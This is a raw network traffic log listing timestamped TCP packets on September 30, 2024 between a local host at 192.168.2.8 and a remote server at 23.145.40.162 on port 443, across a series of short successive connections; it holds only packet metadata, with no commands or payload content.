Sep 30, 2024 15:38:44.970503092 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.011579037 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.024482012 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.024496078 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.024521112 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.024581909 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.024615049 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.024629116 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.025407076 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.025414944 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.025453091 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.025484085 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.025496960 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.025511026 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.026668072 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.026676893 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.026730061 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.026741982 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.026751995 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.039237976 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.039247036 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.039321899 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.039343119 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.058898926 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.058933020 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.058988094 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.059015036 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.059030056 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.061146975 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.061188936 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.061217070 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.061234951 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.061248064 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.084117889 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.084211111 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.084233046 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.084541082 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.084549904 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.084830046 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.084841013 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.115187883 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.115236998 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.115293026 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.115319014 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.115338087 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.116234064 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.116244078 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.116316080 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.116328955 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.116899967 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.116909981 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.116961956 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.116974115 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.129868984 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.129911900 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.129967928 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.129988909 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.130002975 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.130462885 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.130501986 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.130520105 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.130530119 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.130547047 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.149405003 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.149492979 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.149516106 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.151299953 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.151333094 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.151395082 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.151407003 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.151429892 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.151709080 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.151956081 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.151966095 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.152249098 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.152308941 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.152317047 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.153160095 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.153237104 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.153247118 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.175872087 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.175997019 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.176013947 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.176253080 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.176264048 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.176331997 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.176342964 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.205507994 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.205600023 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.205617905 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.205797911 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.205809116 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.205852032 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.205861092 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.205874920 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.206562996 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.206599951 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.206615925 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.206630945 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.206645012 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.206727028 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.206780910 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.206790924 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.207624912 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.207688093 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.207696915 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.208327055 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.208385944 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.208395004 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.219882965 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.219994068 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.220010042 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.220110893 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.220174074 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.220182896 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.220362902 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.220427036 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.220434904 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.239733934 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.239814997 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.239840984 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.239861012 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.239877939 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.239893913 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.239943981 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.240099907 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.240117073 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.240129948 CEST	49738	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.240137100 CEST	443	49738	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.283763885 CEST	49739	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.283817053 CEST	443	49739	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.283912897 CEST	49739	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.284271002 CEST	49739	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.284281015 CEST	443	49739	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.883558035 CEST	443	49739	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.883657932 CEST	49739	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.884994030 CEST	49739	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.885005951 CEST	443	49739	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.885286093 CEST	443	49739	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:45.886084080 CEST	49739	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.886113882 CEST	49739	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:45.886117935 CEST	443	49739	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:46.251578093 CEST	443	49739	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:46.251646042 CEST	443	49739	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:46.251698017 CEST	49739	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:46.251801014 CEST	49739	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:46.251823902 CEST	443	49739	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:46.251840115 CEST	49739	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:46.251846075 CEST	443	49739	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:46.258851051 CEST	49740	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:46.258904934 CEST	443	49740	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:46.259044886 CEST	49740	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:46.259313107 CEST	49740	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:46.259332895 CEST	443	49740	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:46.888057947 CEST	443	49740	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:46.888258934 CEST	49740	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:46.889565945 CEST	49740	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:46.889580965 CEST	443	49740	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:46.889918089 CEST	443	49740	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:46.893179893 CEST	49740	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:46.894838095 CEST	49740	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:46.894862890 CEST	443	49740	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:47.176825047 CEST	443	49740	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:47.176889896 CEST	443	49740	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:47.177072048 CEST	49740	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:47.177097082 CEST	49740	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:47.177113056 CEST	443	49740	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:47.177124977 CEST	49740	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:47.177131891 CEST	443	49740	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:47.179941893 CEST	49741	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:47.179989100 CEST	443	49741	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:47.180069923 CEST	49741	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:47.180346012 CEST	49741	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:47.180361032 CEST	443	49741	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:47.792395115 CEST	443	49741	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:47.792540073 CEST	49741	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:47.793746948 CEST	49741	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:47.793756008 CEST	443	49741	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:47.794050932 CEST	443	49741	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:47.794709921 CEST	49741	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:47.794751883 CEST	49741	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:47.794755936 CEST	443	49741	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:48.079582930 CEST	443	49741	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:48.079663992 CEST	443	49741	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:48.079824924 CEST	49741	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:48.080452919 CEST	49741	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:48.080492020 CEST	443	49741	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:48.080514908 CEST	49741	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:48.080522060 CEST	443	49741	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:48.160033941 CEST	49742	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:48.160075903 CEST	443	49742	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:48.160134077 CEST	49742	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:48.160695076 CEST	49742	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:48.160706997 CEST	443	49742	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:48.826982975 CEST	443	49742	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:48.827048063 CEST	49742	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:48.828769922 CEST	49742	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:48.828784943 CEST	443	49742	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:48.829050064 CEST	443	49742	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:48.830147028 CEST	49742	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:48.830223083 CEST	49742	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:48.830241919 CEST	443	49742	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:49.104392052 CEST	443	49742	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:49.104465961 CEST	443	49742	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:49.104603052 CEST	49742	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:49.104603052 CEST	49742	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:49.104696989 CEST	49742	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:49.104720116 CEST	443	49742	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:49.122601032 CEST	49743	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:49.122653961 CEST	443	49743	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:49.122781992 CEST	49743	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:49.123255014 CEST	49743	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:49.123270988 CEST	443	49743	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:50.493033886 CEST	443	49743	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:50.493119001 CEST	49743	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:50.496256113 CEST	49743	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:50.496273041 CEST	443	49743	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:50.496675968 CEST	443	49743	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:50.503094912 CEST	49743	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:50.503331900 CEST	49743	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:50.503340960 CEST	443	49743	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:51.323709965 CEST	443	49743	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:51.323792934 CEST	443	49743	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:51.323844910 CEST	49743	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:51.323956966 CEST	49743	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:51.323973894 CEST	443	49743	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:51.323987961 CEST	49743	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:51.323993921 CEST	443	49743	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:51.378707886 CEST	49744	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:51.378743887 CEST	443	49744	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:51.378859997 CEST	49744	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:51.379199982 CEST	49744	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:51.379210949 CEST	443	49744	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.009162903 CEST	443	49744	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.009308100 CEST	49744	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.010500908 CEST	49744	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.010519028 CEST	443	49744	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.010760069 CEST	443	49744	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.011755943 CEST	49744	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.011799097 CEST	49744	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.011811018 CEST	443	49744	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.294545889 CEST	443	49744	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.294611931 CEST	443	49744	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.294677973 CEST	49744	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.294789076 CEST	49744	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.294789076 CEST	49744	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.294842958 CEST	443	49744	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.294857025 CEST	443	49744	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.298418999 CEST	49745	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.298465014 CEST	443	49745	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.298530102 CEST	49745	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.298888922 CEST	49745	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.298903942 CEST	443	49745	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.981594086 CEST	443	49745	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.981715918 CEST	49745	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.982935905 CEST	49745	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.982944965 CEST	443	49745	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.983211994 CEST	443	49745	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:52.984028101 CEST	49745	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.984117985 CEST	49745	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:52.984123945 CEST	443	49745	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:53.297605991 CEST	443	49745	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:53.297671080 CEST	443	49745	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:53.297779083 CEST	49745	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:53.297812939 CEST	443	49745	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:53.297825098 CEST	49745	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:53.297833920 CEST	443	49745	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:53.297842026 CEST	49745	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:53.297846079 CEST	443	49745	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:53.300623894 CEST	49746	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:53.300651073 CEST	443	49746	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:53.300718069 CEST	49746	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:53.300993919 CEST	49746	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:53.301008940 CEST	443	49746	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:53.909950018 CEST	443	49746	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:53.910099030 CEST	49746	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:53.911447048 CEST	49746	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:53.911456108 CEST	443	49746	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:53.911695957 CEST	443	49746	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:53.912440062 CEST	49746	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:53.912475109 CEST	49746	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:53.912498951 CEST	443	49746	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:54.205291033 CEST	443	49746	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:54.205353975 CEST	443	49746	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:54.205401897 CEST	49746	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:54.205653906 CEST	49746	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:54.205672979 CEST	443	49746	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:54.205684900 CEST	49746	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:54.205689907 CEST	443	49746	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:54.219185114 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:54.219238997 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:54.219299078 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:54.219665051 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:54.219676018 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:54.833034992 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:54.833177090 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:54.850267887 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:54.850331068 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:54.850668907 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:54.902235031 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:54.937808990 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:54.938462019 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:54.938534975 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.243288994 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.243316889 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.243324041 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.243354082 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.243398905 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.243419886 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.243433952 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.292815924 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.292841911 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.333632946 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.333642960 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.333673000 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.333694935 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.333719015 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.333730936 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.334770918 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.334779978 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.334805012 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.334827900 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.334835052 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.334851027 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.384078026 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.384090900 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.384134054 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.384151936 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.405664921 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.405678988 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.405715942 CEST	443	49747	23.145.40.162	192.168.2.8
Sep 30, 2024 15:38:55.405756950 CEST	49747	443	192.168.2.8	23.145.40.162
Sep 30, 2024 15:38:55.405781031 CEST	443	49747	23.145.40.162	192.168.2.8
